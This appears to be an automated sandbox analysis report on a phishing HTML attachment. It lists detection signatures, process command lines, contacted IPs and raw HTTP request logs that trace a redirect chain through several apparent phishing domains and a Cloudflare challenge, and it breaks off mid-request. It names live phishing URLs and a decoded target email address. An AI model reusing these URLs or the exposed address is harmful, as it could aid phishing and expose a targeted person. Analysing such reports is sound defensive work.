Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ATT562720.htm

Overview

General Information

Sample name:ATT562720.htm
Analysis ID:1585508
MD5:beb9741f7e9f74a33b95b01fda0c6d7d
SHA1:7c9c8cc40449abe56991f3953177a0dad40184eb
SHA256:4adef8608999db9208719ae5c517bafe9b884d3c4a092b771f3f2fd53530b318
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

HTML file submission requesting Cloudflare captcha challenge
AI detected suspicious Javascript
Detected javascript redirector / loader
HTML Script injector detected
Detected non-DNS traffic on DNS port
Detected suspicious crossdomain redirect
HTML page contains hidden javascript code
IP address seen in connection with other malware
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6504 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\ATT562720.htm MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6856 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2180 --field-trial-handle=1976,i,13158292659480297210,1621453939140993406,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

Phishing

barindex
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://porposal-ach.pages.dev/#?service=YzNWellXN... The script demonstrates several high-risk behaviors, including data exfiltration, dynamic code execution, and interaction with suspicious domains. While some of the functionality may be legitimate, the overall implementation raises significant security concerns.
Source: 0.10.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://abb0tt.net/?cf-turnstile-response=0.SymkIi... The provided JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirection to a suspicious domain. The heavily obfuscated URL further indicates malicious intent, resulting in a high-risk score.
Source: 0.11.i.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://abb0tt.net/?cf-turnstile-response=0.SymkIi... This JavaScript snippet exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `eval`, `Function` constructor, and heavily encoded strings indicates a high likelihood of malicious intent. Additionally, the script appears to be attempting to redirect the user to an unknown or suspicious domain, which further increases the risk. Overall, this script demonstrates a clear pattern of malicious activity and should be considered a high-risk threat.
Source: ATT562720.htmHTTP Parser: Low number of body elements: 1
Source: file:///C:/Users/user/Desktop/ATT562720.htmHTTP Parser: New script, src: https://cdn.jsdelivr.net/npm/citiycar@1.1.6/MOMENTUM/NOW.API.JS
Source: ATT562720.htmHTTP Parser: Base64 decoded: susan.andrews@jeffparish.net
Source: ATT562720.htmHTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/ATT562720.htmHTTP Parser: No favicon
Source: https://porposal-ach.pages.dev/#?service=YzNWellXNHVZVzVrY21WM2MwQnFaV1ptY0dGeWFYTm9MbTVsZEE9PSZ0ZXMyJmE=HTTP Parser: No favicon
Source: https://abb0tt.net/?cf-turnstile-response=0.SymkIi_BfYcYfqwEnZaHx7t49zevgXZekeN0KcT2VmX6ef7eIy8OTXXiyt37po9e6GWxxFIHCFfRFJU4wCqeiWnmId1E3CuoUcipU_8BbaxMzTbH-Vghdf8i56U1yZBCSwfyLoIgBDKY4WRaS_lPn5IEm33_z1op4HkkEBuRRQg6szScviPNLd_4ce2XHziixgy6SjvURhb9vPO7RpeB3N_PUvNZLLU8VEUynBLWBbi06h3keXMMqTuRgRUPkjoxhkSJ33j4qApIkmAfdaDVi7WaSBO_hiQ8o-urDZG8ck3Gg-AmuKZ0L9ff0lRh8ZTMUlFktSQogQ40yyb1mHrU3AP7GQh92FgqlsF5DoJeZO_gpqkS9MAM5EcneVVauofDDyXR5-OPbb0tm81IvaD5Ov9BM9xutW4J2ERXa0eFnAj-Kvw8RyvyiBOvtVcgQPT8vecg0iODY6Xc5RW0G_1U_8ni5lehlk39fS7HHOleLm3CSCPXtlkGcjKoGx8nWzFeYPmQ_pWuM_Xy7eQ3AB1PocwW9c5bHEXSl-2BqN_d7nC5p_BOoBjSkqnPimV5mOEG7aNGDQyddkv5QbATCVYrsb_TYhJ6CN4FeJpnY4t9SJtUz4gyX-ZRnNXe6ZO3DcmmMxgQHzQUxnjFttmEfaidYBN1A8kwyd6XIe60VCVTdTXBBIffeEmZQi3C_wZ5k5qElt05XgfvEJ8ttK_zXAth6pcu5FTiqbh9xoYE1O5ne5dHWDrGQ2qj5yzM34jJlPxb.NlHyrkBXsakvpHDE1QlTxQ.e18051cf1aaab27119e39aa8bed1a5d3144ccf7c212403d2850c191c1605bdf5&cf-turnstile-response=0.SymkIi_BfYcYfqwEnZaHx7t49zevgXZekeN0KcT2VmX6ef7eIy8OTXXiyt37po9e6GWxxFIHCFfRFJU4wCqeiWnmId1E3CuoUci...HTTP Parser: No favicon
Source: global trafficTCP traffic: 192.168.2.16:49813 -> 1.1.1.1:53
Source: C:\Program Files\Google\Chrome\Application\chrome.exeHTTP traffic: Redirect from: abb0tt.net to https://href.li/?https://en.wikipedia.org/wiki/windows_server_2019#dummybot
Source: Joe Sandbox ViewIP Address: 104.18.94.41 104.18.94.41
Source: Joe Sandbox ViewIP Address: 104.18.95.41 104.18.95.41
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: Joe Sandbox ViewIP Address: 151.101.130.137 151.101.130.137
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
Source: unknownTCP traffic detected without corresponding DNS query: 40.126.31.73
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: tiny-hat-eab8.pagenew.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: tiny-hat-eab8.pagenew.workers.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: porposal-ach.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.7.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://porposal-ach.pages.devsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://porposal-ach.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: porposal-ach.pages.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://porposal-ach.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.7.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: porposal-ach.pages.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /public/api/validate_key/tes2 HTTP/1.1Host: natrium100gram.siteConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Accept: */*sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://porposal-ach.pages.devSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://porposal-ach.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: abb0tt.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://porposal-ach.pages.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: abb0tt.netConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://abb0tt.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=aa7j8tvauvrfcetoopclfb3glv
Source: global trafficHTTP traffic detected: GET /public/api/validate_key/tes2 HTTP/1.1Host: natrium100gram.siteConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://abb0tt.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://abb0tt.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/849bfe45bf45/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/8kp02/0x4AAAAAAA4x4r1MWw9jS7Mf/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://abb0tt.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe5cd656b664309&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/8kp02/0x4AAAAAAA4x4r1MWw9jS7Mf/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/8kp02/0x4AAAAAAA4x4r1MWw9jS7Mf/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8fe5cd656b664309&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1983417942:1736270882:GHoc2fFjXXTeUPHab0fnxkH_ZMOKbETBkUUeI55wVUk/8fe5cd656b664309/vJO8rcAx8S2HNjCFwKcIV21R6.xqp0Bag5wcBIJxjdo-1736272354-1.1.1.1-BucLhSdazHW819pbiqA0cZD_qiNfENBnvO95ulqj53nbxoxfhOTryNuSf_oD4RGo HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/8fe5cd656b664309/1736272355851/dedc7b011d73c1bf6e1bc0d43b269d006b7b0ba3cc013e3b5183795105288edc/6-1OoBsC45h5gCa HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/8kp02/0x4AAAAAAA4x4r1MWw9jS7Mf/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8fe5cd656b664309/1736272355861/hkBWC5gd4FFlI6b HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/8kp02/0x4AAAAAAA4x4r1MWw9jS7Mf/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/8fe5cd656b664309/1736272355861/hkBWC5gd4FFlI6b HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1983417942:1736270882:GHoc2fFjXXTeUPHab0fnxkH_ZMOKbETBkUUeI55wVUk/8fe5cd656b664309/vJO8rcAx8S2HNjCFwKcIV21R6.xqp0Bag5wcBIJxjdo-1736272354-1.1.1.1-BucLhSdazHW819pbiqA0cZD_qiNfENBnvO95ulqj53nbxoxfhOTryNuSf_oD4RGo HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1983417942:1736270882:GHoc2fFjXXTeUPHab0fnxkH_ZMOKbETBkUUeI55wVUk/8fe5cd656b664309/vJO8rcAx8S2HNjCFwKcIV21R6.xqp0Bag5wcBIJxjdo-1736272354-1.1.1.1-BucLhSdazHW819pbiqA0cZD_qiNfENBnvO95ulqj53nbxoxfhOTryNuSf_oD4RGo HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /?cf-turnstile-response=0.SymkIi_BfYcYfqwEnZaHx7t49zevgXZekeN0KcT2VmX6ef7eIy8OTXXiyt37po9e6GWxxFIHCFfRFJU4wCqeiWnmId1E3CuoUcipU_8BbaxMzTbH-Vghdf8i56U1yZBCSwfyLoIgBDKY4WRaS_lPn5IEm33_z1op4HkkEBuRRQg6szScviPNLd_4ce2XHziixgy6SjvURhb9vPO7RpeB3N_PUvNZLLU8VEUynBLWBbi06h3keXMMqTuRgRUPkjoxhkSJ33j4qApIkmAfdaDVi7WaSBO_hiQ8o-urDZG8ck3Gg-AmuKZ0L9ff0lRh8ZTMUlFktSQogQ40yyb1mHrU3AP7GQh92FgqlsF5DoJeZO_gpqkS9MAM5EcneVVauofDDyXR5-OPbb0tm81IvaD5Ov9BM9xutW4J2ERXa0eFnAj-Kvw8RyvyiBOvtVcgQPT8vecg0iODY6Xc5RW0G_1U_8ni5lehlk39fS7HHOleLm3CSCPXtlkGcjKoGx8nWzFeYPmQ_pWuM_Xy7eQ3AB1PocwW9c5bHEXSl-2BqN_d7nC5p_BOoBjSkqnPimV5mOEG7aNGDQyddkv5QbATCVYrsb_TYhJ6CN4FeJpnY4t9SJtUz4gyX-ZRnNXe6ZO3DcmmMxgQHzQUxnjFttmEfaidYBN1A8kwyd6XIe60VCVTdTXBBIffeEmZQi3C_wZ5k5qElt05XgfvEJ8ttK_zXAth6pcu5FTiqbh9xoYE1O5ne5dHWDrGQ2qj5yzM34jJlPxb.NlHyrkBXsakvpHDE1QlTxQ.e18051cf1aaab27119e39aa8bed1a5d3144ccf7c212403d2850c191c1605bdf5&cf-turnstile-response=0.SymkIi_BfYcYfqwEnZaHx7t49zevgXZekeN0KcT2VmX6ef7eIy8OTXXiyt37po9e6GWxxFIHCFfRFJU4wCqeiWnmId1E3CuoUcipU_8BbaxMzTbH-Vghdf8i56U1yZBCSwfyLoIgBDKY4WRaS_lPn5IEm33_z1op4HkkEBuRRQg6szScviPNLd_4ce2XHziixgy6SjvURhb9vPO7RpeB3N_PUvNZLLU8VEUynBLWBbi06h3keXMMqTuRgRUPkjoxhkSJ33j4qApIkmAfdaDVi7WaSBO_hiQ8o-urDZG8ck3Gg-AmuKZ0L9ff0lRh8ZTMUlFktSQogQ40yyb1mHrU3AP7GQh92FgqlsF5DoJeZO_gpqkS9MAM5EcneVVauofDDyXR5-OPbb0tm81IvaD5Ov9BM9xutW4J2ERXa0eFnAj-Kvw8RyvyiBOvtVcgQPT8vecg0iODY6Xc5RW0G_1U_8ni5lehlk39fS7HHOleLm3CSCPXtlkGcjKoGx8nWzFeYPmQ_pWuM_Xy7eQ3AB1PocwW9c5bHEXSl-2BqN_d7nC5p_BOoBjSkqnPimV5mOEG7aNGDQyddkv5QbATCVYrsb_TYhJ6CN4FeJpnY4t9SJtUz4gyX-ZRnNXe6ZO3DcmmMxgQHzQUxnjFttmEfaidYBN1A8kwyd6XIe60VCVTdTXBBIffeEmZQi3C_wZ5k5qElt05XgfvEJ8ttK_zXAth6pcu5FTiqbh9xoYE1O5ne5dHWDrGQ2qj5yzM34jJlPxb.NlHyrkBXsakvpHDE1QlTxQ.e18051cf1aaab27119e39aa8bed1a5d3144ccf7c212403d2850c191c1605bdf5 HTTP/1.1Host: abb0tt.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", 